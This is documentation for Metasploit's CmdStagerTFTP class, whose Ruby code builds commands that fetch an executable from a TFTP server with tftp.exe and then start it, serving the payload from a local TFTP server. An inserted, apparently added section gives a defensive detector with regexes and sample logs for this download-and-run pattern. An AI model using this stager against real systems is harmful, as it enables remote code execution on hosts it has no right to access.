Class: Rex::Exploitation::CmdStagerTFTP
- Inherits: CmdStagerBase
  - Object
  - CmdStagerBase
  - Rex::Exploitation::CmdStagerTFTP
- Defined in: lib/rex/exploitation/cmdstager/tftp.rb
Overview
This class provides the ability to create a sequence of commands from an executable. When this sequence is run via command injection or a shell, the resulting exe will be written to disk and executed.
This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.
Requires: tftp.exe, outbound UDP connectivity to a TFTP server
Written by Joshua J. Drake
Instance Attribute Summary
- #exe ⇒ Object (readonly)
  NOTE: We don’t use a concatenation operator here since we only have a couple commands.
- #payload_exe ⇒ Object (readonly)
  Returns the value of attribute payload_exe.
- #tftp ⇒ Object
  Returns the value of attribute tftp.
Instance Method Summary
- #compress_commands(cmds, opts) ⇒ Object
  We override compress_commands just to stick in a few extra commands at the last second.
- #initialize(exe) ⇒ CmdStagerTFTP (constructor)
  A new instance of CmdStagerTFTP.
- #setup(mod) ⇒ Object
- #teardown(mod = nil) ⇒ Object
Methods inherited from CmdStagerBase
#cmd_concat_operator, #encode_payload, #generate, #generate_cmds, #generate_cmds_decoder, #generate_cmds_payload, #parts_to_commands, #slice_up_payload
Constructor Details
#initialize(exe) ⇒ CmdStagerTFTP
Returns a new instance of CmdStagerTFTP.
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 28
def initialize(exe)
  super
  @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end
Instance Attribute Details
#exe ⇒ Object (readonly)
NOTE: We don’t use a concatenation operator here since we only have a couple commands. There really isn’t any need to combine them. Also, the ms01_026 exploit depends on the start command being issued separately so that it can ignore it :)
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 66
def exe
  @exe
end
#payload_exe ⇒ Object (readonly)
Returns the value of attribute payload_exe.
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 67
def payload_exe
  @payload_exe
end
#tftp ⇒ Object
Returns the value of attribute tftp.
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 68
def tftp
  @tftp
end
Instance Method Details
#compress_commands(cmds, opts) ⇒ Object
We override compress_commands just to stick in a few extra commands at the last second.
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 48
def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"
  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end
  super
end
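From the defender's side, the two commands appended by compress_commands (a binary-mode tftp.exe GET that writes an .exe, then a start of that same path) leave a recognizable pair of records in process-creation logs. The following Ruby code is an added example, not part of Metasploit or of this class; the log line format, the Event struct and the function names are assumptions made for illustration, and the sample records are constructed.

```ruby
# tftp -i <server> GET <remote> <local>.exe, the shape built by compress_commands
TFTP_GET  = /\btftp(?:\.exe)?\s+-i\s+(?<server>\S+)\s+get\s+(?<remote>\S+)\s+(?<local>\S+\.exe)\b/i
START_CMD = /\bstart\s+(?<path>\S+\.exe)\b/i

Event = Struct.new(:time, :host, :cmdline)

# Assumed log format (constructed for this example): "<epoch> <host> <command line>"
def parse_line(line)
  time, host, cmdline = line.strip.split(' ', 3)
  return nil if cmdline.nil? || time !~ /\A\d+\z/
  Event.new(time.to_i, host, cmdline)
end

# Returns one finding per tftp download of an .exe. :executed becomes true when
# the same path is started on the same host within `window` seconds.
def detect_tftp_staging(lines, window: 60)
  events = lines.map { |l| parse_line(l) }.compact.sort_by(&:time)
  findings = []
  events.each do |ev|
    if (m = TFTP_GET.match(ev.cmdline))
      findings << { host: ev.host, time: ev.time, server: m[:server],
                    path: m[:local], executed: false }
    elsif (m = START_CMD.match(ev.cmdline))
      hit = findings.find do |f|
        f[:host] == ev.host && f[:path].casecmp?(m[:path]) &&
          (ev.time - f[:time]).between?(0, window)
      end
      hit[:executed] = true if hit
    end
  end
  findings
end

# Constructed sample records; 192.0.2.10 is a documentation-range address.
SAMPLE_LOG = [
  '1700000000 WEB01 cmd.exe /c tftp -i 192.0.2.10 GET aB3dE9xQ %TEMP%\\QwErTyUi.exe',
  '1700000002 WEB01 cmd.exe /c start %TEMP%\\QwErTyUi.exe',
  '1700000005 WEB02 cmd.exe /c start C:\\Tools\\backup.exe',
  '1700000100 DB01 tftp.exe -i 192.0.2.10 GET fw.bin C:\\Temp\\fw.exe',
  'malformed line'
].freeze

detect_tftp_staging(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

A download with no matching start is still reported with executed set to false, since tftp.exe writing an executable is worth triage on its own.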
#setup(mod) ⇒ Object
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 33
def setup(mod)
  # Assign the instance variable: a bare `tftp = ...` would create a local
  # variable and leave the tftp attribute nil when teardown calls tftp.stop.
  @tftp = Rex::Proto::TFTP::Server.new
  tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
  tftp.start
  mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
#teardown(mod = nil) ⇒ Object
# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 40
def teardown(mod = nil)
  tftp.stop
end